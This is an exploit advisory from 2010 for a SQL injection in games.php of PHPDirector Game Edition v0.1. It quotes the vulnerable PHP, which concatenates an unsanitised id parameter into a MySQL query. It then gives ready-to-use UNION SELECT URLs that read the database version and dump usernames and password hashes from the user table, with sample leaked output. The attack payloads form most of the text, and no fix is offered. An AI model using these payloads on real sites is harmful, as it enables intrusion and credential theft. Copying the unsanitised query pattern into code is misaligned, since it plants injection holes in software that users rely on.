PHPDirector Game Edition SQL Injection

`# Exploit Title: PHPDirector Game Edition SQL Injection Vulnerability (games.php)  
# Date: 2010-01-05  
# Author: Zer0 Thunder  
# Site : http://www.play-online.bzh.be/forum/  
# Software Link: http://www.play-online.bzh.be/forum/download/phpdirectorgameedition.zip  
# Version: v0.1  
# Tested on: Windows XP sp2 [WampServer 2.0i ] / LinuxBox (Ubuntu Server)  
# CVE :   
# Code :  
  
  
  
  
Page : Games.php Vuln Page  
-----------------------------------------  
if(isset($_GET['id']))  
{  
$query_co = "SELECT * FROM pp_comment,pp_user WHERE pp_comment.nom = pp_user.user AND pp_comment.file_id=$_GET[id] ORDER BY pp_comment.id DESC";  
$result_co = mysql_query($query_co);  
while ($row_co = mysql_fetch_assoc($result_co)){  
$game_co[] = $row_co;  
}  
$smarty->assign('game_co', $game_co);  
}  
-----------------------------------  
  
  
Exploit :  
http://site/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
  
Example :   
  
DB Version  
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
  
Users  
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--  
  
########################################  
#  
# Note : When I did this SQL Injection The User Name And Password Appeared On the Title Bar so   
# <title>Bens Videos - 1:test:098f6bcd4621d373cade4e832627b4f6</title>  
# View Open Source And Check the title   
#  
########################################  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
########################################  
# MSN : [email protected]  
# Email : [email protected]  
# Site : LKHackers.com  
# Greetz : To all my friends  
# Note : Proud to be a Sri Lankan  
# Me : Sri Lankan Hacker  
########################################  
`